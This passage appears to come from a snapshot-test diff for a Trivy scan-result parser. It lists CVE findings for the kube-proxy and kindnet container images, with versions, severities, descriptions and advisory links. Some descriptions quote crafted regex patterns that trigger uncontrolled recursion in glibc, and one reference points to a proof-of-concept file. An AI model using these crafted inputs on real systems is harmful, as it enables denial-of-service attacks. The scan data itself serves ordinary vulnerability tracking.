}, - "category": "Vulnerability", - "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "sqlite: heap out-of-bound read in function rtreenode()", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-8457", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-2", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-2", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4004-1/", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4004-2/", - }, + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "https://usn.ubuntu.com/4019-1/", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4019-2/", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2020.html", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.sqlite.org/releaselog/3_28_0.html", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-12886", - "installedVersion": "1:8.3.0-6", - "packageName": "libgcc1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "1:8.3.0-6", - "packageName": "libgcc1", + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33560", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", - "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - "https://access.redhat.com/security/cve/CVE-2021-33560", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", - "https://dev.gnupg.org/T5305", - "https://dev.gnupg.org/T5328", - "https://dev.gnupg.org/T5466", - "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2021-4409.html", - "https://linux.oracle.com/cve/CVE-2021-33560.html", - "https://linux.oracle.com/errata/ELSA-2022-9263.html", - "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33560", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - ], - }, - "category": "Vulnerability", - "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33560", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33560", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5305", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5328", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5466", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", + ], + }, + "category": "Vulnerability", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "references": [ { "type": "URL", - "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://eprint.iacr.org/2021/923", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", + ], + }, + "category": "Vulnerability", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-13627", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", - "http://www.openwall.com/lists/oss-security/2019/10/02/2", - "https://access.redhat.com/security/cve/CVE-2019-13627", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", - "https://dev.gnupg.org/T4683", - "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", - "https://linux.oracle.com/cve/CVE-2019-13627.html", - "https://linux.oracle.com/errata/ELSA-2020-4482.html", - "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", - "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", - "https://minerva.crocs.fi.muni.cz/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", - "https://security-tracker.debian.org/tracker/CVE-2019-13627", - "https://security.gentoo.org/glsa/202003-32", - "https://ubuntu.com/security/notices/USN-4236-1", - "https://ubuntu.com/security/notices/USN-4236-2", - "https://ubuntu.com/security/notices/USN-4236-3", - "https://usn.ubuntu.com/4236-1/", - "https://usn.ubuntu.com/4236-2/", - "https://usn.ubuntu.com/4236-3/", - "https://www.cve.org/CVERecord?id=CVE-2019-13627", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, "category": "Vulnerability", - "description": "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libgcrypt: ECDSA timing attack allowing private key leak", + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-13627", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2019/10/02/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-13627", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", - }, - { - "type": "URL", - "value": "https://dev.gnupg.org/T4683", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-13627.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4482.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "https://minerva.crocs.fi.muni.cz/", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-13627", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202003-32", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-1", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-3", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-1/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-2/", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-3/", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-13627", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.8.4-5+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-40528", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:5311", - "https://access.redhat.com/security/cve/CVE-2021-40528", - "https://bugzilla.redhat.com/2002816", - "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", - "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2022-5311.html", - "https://errata.rockylinux.org/RLSA-2022:5311", - "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", - "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", - "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", - "https://linux.oracle.com/cve/CVE-2021-40528.html", - "https://linux.oracle.com/errata/ELSA-2022-9564.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-40528", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + 